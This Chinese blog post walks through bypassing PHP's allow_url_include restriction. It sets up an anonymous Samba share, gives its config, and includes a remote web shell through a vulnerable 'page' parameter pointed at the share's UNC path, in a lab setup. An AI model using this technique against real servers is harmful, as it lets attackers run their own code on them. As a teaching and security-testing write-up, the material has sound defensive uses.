使用SMB共享来绕过php远程文件包含的限制执行RFI的利用


Posted in PHP onMay 31, 2019

在这篇博文中,我将为大家演示如何利用PHP应用中的远程文件包含漏洞的技术。我们将绕过php远程文件包含的限制,并执行RFI的利用,即使PHP环境被配置为不包含来自远程HTTP/FTP URL的文件。

PHP 和 SMB 共享文件访问

在PHP配置文件中,“allow_url_include”wrapper默认设置为“Off”,指示PHP不加载远程HTTP或FTP URL,从而防止远程文件包含攻击。但是,即使“allow_url_include”和“allow_url_fopen”都设置为“Off”,PHP也不会阻止加载SMB URL。而这就极有可能被滥用来从SMB共享加载远程托管的PHP Web shell。

攻击场景概述

当易受攻击的PHP应用程序代码尝试从受攻击者控制的SMB共享加载PHP Web shell时,SMB共享应允许访问该文件。攻击者需要在其上配置具有匿名浏览访问权限的SMB服务器。因此,一旦易受攻击的应用程序尝试从SMB共享访问PHP Web shell,SMB服务器将不会要求任何的凭据,易受攻击的应用程序将包含Web shell的PHP代码。

首先,我重新配置了PHP环境,并在php.in i文件中禁用了“allow-url-fopen”和“allow-url-include”。之后,配置了具有匿名浏览访问的SMB服务器。一旦SMB共享准备就绪,我们就可以利用易受攻击的应用程序了。

PHP 环境设置

将托管易受攻击代码的机器上的“allow_url_fopen”和“allow_url_include”设置为“Off”

以下是版本为“5.5.11”的PHP当前配置截图:

使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 

在继续下一步之前,让我们确保当我们尝试访问HTTP上托管的Web shell时,PHP代码不允许远程文件包含。

使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 

可以看到,当我试图从远程主机包含PHP Web shell时,应用程序抛出错误并且没有包含远程文件。

使用匿名浏览访问配置 Samba 服务器(Linux 机器)
使用以下命令安装Samba服务器:

apt-get install samba创建SMB共享目录:

mkdir /var/www/html/pub/

使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 

配置新创建的SMB共享目录的权限:

chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/

使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 

运行以下命令,删除SAMBA服务器配置文件的默认内容。

echo > /etc/samba/smb.conf将以下内容添加到/etc/samba/smb.conf文件。

[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes
[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555

force user = nobody现在,重启SAMBA服务器以使配置文件/etc/samba/smb.conf中的新配置生效。

service smbd restart成功重启SAMBA服务器后,尝试访问SMB共享并确保SAMBA服务器不要求提供凭据。

在本例中,SAMBA服务器IP为192.168.0.3,我需要访问Windows文件浏览器中的SMB共享,如下:

\\192.168.0.3\ 

使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 

在 SMB 共享中托管 PHP Web shell

太棒了!可以访问smb共享,并显示目录“ica”存在。

使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 

现在,将PHP shell托管在目录“/var/www/html/pub”中,该目录为smb共享目录“ica”。

成功托管PHP shell后,我们使用Windows文件浏览器访问SMB共享目录“ica”。

\\192.168.0.3\ica\可以看到php shell存在于smb共享目录中,在本例中为box.php文件。

使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 

利用文件包含易受攻击的参数
让我们使用这个PHP shell SMB链接,以及易受攻击的php代码浏览它。

http://vulnerable_application/page.php?page=\\192.168.0.3\ica\box.phpPHP易受攻击的代码从SMB共享中获取了web shell,并在应用程序服务器上执行了代码\m/。我们已经绕过了php远程文件包含的限制,并包含了托管在远程主机上的Web shell。

使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 

总结

以上所述是小编给大家介绍的使用SMB共享来绕过php远程文件包含的限制执行RFI的利用,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对三水点靠木网站的支持!

PHP 相关文章推荐
php学习笔记 PHP面向对象的程序设计
Jun 13 PHP
组合算法的PHP解答方法
Feb 04 PHP
php生成略缩图代码
Jul 16 PHP
PHP 面向对象程序设计(oop)学习笔记(三) - 单例模式和工厂模式
Jun 12 PHP
php递归遍历多维数组的方法
Apr 18 PHP
PHP编程中的__clone()方法使用详解
Nov 27 PHP
PHP+shell脚本操作Memcached和Apache Status的实例分享
Mar 11 PHP
Linux php 中文乱码的快速解决方法
May 13 PHP
Laravel5中防止XSS跨站攻击的方法
Oct 10 PHP
Laravel的Auth验证Token验证使用自定义Redis的例子
Sep 30 PHP
php获取是星期几的的一些常用姿势
Dec 15 PHP
laravel 框架执行流程与原理简单分析
Feb 01 PHP
PHP使用ActiveMQ实现消息队列的方法详解
May 31 #PHP
php中的buffer缓冲区用法分析
May 31 #PHP
PHP实现基于状态的责任链审批模式详解
May 31 #PHP
Laravel框架实现调用百度翻译API功能示例
May 30 #PHP
Laravel框架学习笔记之批量更新数据功能
May 30 #PHP
PHP实现的微信公众号扫码模拟登录功能示例
May 30 #PHP
PHP使用PDO创建MySQL数据库、表及插入多条数据操作示例
May 30 #PHP
You might like
PHP函数篇之掌握ord()与chr()函数应用
2011/12/05 PHP
PHP5函数小全(分享)
2013/06/06 PHP
php格式化电话号码的方法
2015/04/24 PHP
Yii2单元测试用法示例
2016/11/12 PHP
[原创]PHPCMS遭遇会员投稿审核无效的解决方法
2017/01/11 PHP
跨域表单提交状态的变相判断代码
2009/11/12 Javascript
简短几句 通俗解释javascript的闭包
2011/01/17 Javascript
jquery常用方法及使用示例汇总
2014/11/08 Javascript
最流行的Node.js精简型和全栈型开发框架介绍
2015/02/26 Javascript
js淡入淡出焦点图幻灯片效果代码分享
2015/09/08 Javascript
JavaScript使用ZeroClipboard操作剪切板
2017/05/10 Javascript
用js实现before和after伪类的样式修改的示例代码
2017/09/07 Javascript
javascript按顺序加载运行js方法
2017/12/01 Javascript
Vue 父子组件数据传递的四种方式( inheritAttrs + $attrs + $listeners)
2018/05/04 Javascript
简单通过settimeout看javascript的运行机制
2019/05/10 Javascript
Layui实现主窗口和Iframe层参数传递
2019/11/14 Javascript
微信小程序录音实现功能并上传(使用node解析接收)
2020/02/26 Javascript
Element InputNumber计数器的使用方法
2020/07/27 Javascript
深入理解javascript中的this
2021/02/08 Javascript
使用Python进行新浪微博的mid和url互相转换实例(10进制和62进制互算)
2014/04/25 Python
Python对小数进行除法运算的正确方法示例
2014/08/25 Python
在Python中使用模块的教程
2015/04/27 Python
Python中django学习心得
2017/12/06 Python
对TensorFlow中的variables_to_restore函数详解
2018/07/30 Python
浅谈Python在pycharm中的调试(debug)
2018/11/29 Python
django框架使用方法详解
2019/07/18 Python
CSS3用@font-face实现自定义英文字体
2013/09/23 HTML / CSS
英国网上花店:Bunches
2016/11/29 全球购物
通息工程毕业生自荐信
2013/10/16 职场文书
建筑个人求职信范文
2014/01/25 职场文书
远程研修随笔感言
2014/02/10 职场文书
地陪导游欢迎词
2015/01/26 职场文书
68句权威创业名言
2019/08/26 职场文书
Go使用协程交替打印字符
2021/04/29 Golang
MySQL 如何分析查询性能
2021/05/12 MySQL
MySQL Server 层四个日志
2022/03/31 MySQL